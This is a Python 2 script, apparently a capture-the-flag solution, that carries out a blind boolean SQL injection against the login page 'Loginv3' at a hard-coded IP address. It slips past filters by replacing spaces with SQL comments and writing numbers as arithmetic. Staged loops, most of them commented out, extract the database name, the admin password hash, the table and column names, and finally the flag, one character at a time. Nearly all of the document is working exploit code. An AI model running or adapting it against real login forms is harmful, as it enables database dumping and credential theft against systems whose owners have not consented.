#! /usr/bin/env python2 import requests as req, string, re, commands db_len = 7 # db_name = 'loginv3' db_name = '' admin_password_len = 60 table_in_db = 3 table_name_len_1 = 4 table_name_len_2 = 5 table_name = 'fl4g' columns_in_table = 5 col_1_len = 2 col_2_len = 4 col_3_len = 8 col_4_len = 8 col_5_len = 4 col_1 = 'flag' col_2 = 'name' col_3 = 'username' col_4 = 'password' col_5 = 'admin' total_rows = 1 # :| id = '1' name = 'admin' username = 'admin' password = '$2y$10$KpEcR/n54ZlX1OeKiLKwY.AfWXSXjUzL.Fk0CVtzsfYpYizThN3Qq' admin = '1' custom_string_printable = [ord(i) for i in string.printable] class pass_empty(object): pass def encode_payload_with_space(payload): if ' ' in payload: payload = payload.replace(' ', '/**/') return payload def send_dirty_payload(payload): resp = req.post('http://45.77.241.3/Loginv3/login.php', data={'username': '\\', 'pass': encode_payload_with_space(payload)}).content return resp def len_with_expression(list): length = [] i = 1 for k, v in enumerate(list): v = str(v) if '0' in v: if re.findall(r'^\d{3}$', v): if '10' in str(i): length.append('{} + {}'.format(99, '9 + 1')) else: length.append('{} + {}'.format(99, i)) i += 1 else: length.append('{} - 1'.format(str(int(v) + 1))) continue length.append(v) return length """ Check db length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length(database())={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ndb len: {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Get db name """ # for i in xrange(1, db_len + 1): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid(database(),{},1))={}#'.format(i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ndb name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Check admin's password length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length((select password from users limit 1))={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\nadmin\'s password len: {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Get admin's password """ # list_admin_password_len = [i for i in xrange(1, admin_password_len + 1)] # for i in len_with_expression(list_admin_password_len): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select password from users limit 1),{},1))={}#'.format(i, v) # if 'User exist' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), send_dirty_payload(payload) # print '{}\nadmin\'s password: {}'.format('-' * 20, db_name) # break # # print payload # print v, chr(eval(v)), send_dirty_payload(payload) """ Count tables in db 'ctf' """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or (select count(table_name) from information_schema.tables where table_schema=database())={}#'.format(v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, k) # break # print k, 'incorrect' """ Check table_name's length """ # for k, v in enumerate(len_with_expression(xrange(100))): # payload = 'or length((select table_name from information_schema.tables where table_schema=database() limit 1,1))={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print k, 'logged user' # print '{}\ntable_name\'s length: {}'.format('-' * 20, k) # break # # print payload # print k, 'incorrect' """ List table in db 'ctf' (fix) # """ # list_table_name_1_len = [i for i in xrange(1, table_name_len_1 + 1)] # for i in len_with_expression(list_table_name_1_len): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1),{},1))={}#'.format( # i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ntable_name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Count columns in db 'ctf' """ # for k, v in enumerate(len_with_expression(xrange(1, 100))): # payload = 'or (select count(column_name) from information_schema.columns where table_schema=database() limit 1)={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ntotal tables in \'ctf\': {}'.format('-' * 20, v) # break # print v, 'incorrect' """ Check column_name's length """ # list_columns_in_table = [i for i in xrange(1, table_name_len_1)] # for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))): # payload = 'or length((select * from (select column_name from information_schema.columns where table_schema=database() limit 1)x limit 1))={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, k, v) # break # print v, 'incorrect' # for i in len_with_expression(list_columns_in_table): # for k, v in enumerate(len_with_expression(xrange(1, 100 + 1))): # payload = 'or length((select column_name from information_schema.columns where table_schema=database() limit {},1))={}#'.format( # i, v) # if 'User exist' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ncolumn {}\'s name length: {}'.format('-' * 20, int(i) + 1, v) # break # # print payload # print v, 'incorrect' """ Get col name """ # for i in xrange(1, 100 + 1): # for k, v in enumerate(len_with_expression(custom_string_printable)): # payload = 'or ascii(mid((select column_name from information_schema.columns where table_schema=database() limit 1,1),{},1))={}#'.format( # i, v) # if 'logged user' in send_dirty_payload(payload): # db_name += chr(eval(v)) # print chr(eval(v)), 'logged user' # print '{}\ncol name: {}'.format('-' * 20, db_name) # break # # print payload # print chr(eval(v)), 'incorrect' """ Count id rows """ # for k, v in enumerate(len_with_expression(xrange(1, 101))): # payload = 'or (select count(pass) from fl4g)={}#'.format( # v) # if 'logged user' in send_dirty_payload(payload): # print v, 'logged user' # print '{}\ntotal rows in \'users\': {}'.format('-' * 20, v) # break # print v, 'incorrect' """ Dump 1 row :| """ for i in xrange(2640, 2700): # position() mysql for k, v in enumerate(len_with_expression(custom_string_printable)): payload = 'or ascii(mid((select flag from fl4g),{},1))={}#'.format( i, v) if 'logged user' in send_dirty_payload(payload): db_name += chr(eval(v)) print chr(eval(v)), 'logged user' print '{}\nflag: {}'.format('-' * 20, db_name) break # print payload print chr(eval(v)), 'incorrect' """ dbg """ # for k, v in enumerate(len_with_expression(custom_string_printable)): # print v, eval(v) # test = [i for i in xrange(1, admin_password_len + 1)] # print len_with_expression(test)